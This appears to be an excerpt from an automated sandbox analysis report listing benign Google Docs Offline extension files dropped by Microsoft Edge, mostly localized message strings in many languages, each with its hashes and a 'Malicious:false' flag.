                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):963
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):884
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):980
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1941
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1969
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1674
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1063
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1263
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1074
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):879
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):843
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                        MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                        SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                        SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                        SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):912
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                        MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                        SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                        SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                        SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11406
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                        MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                        SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                        SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                        SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):854
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                        MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                        SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                        SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                        SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2525
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                        MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                        SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
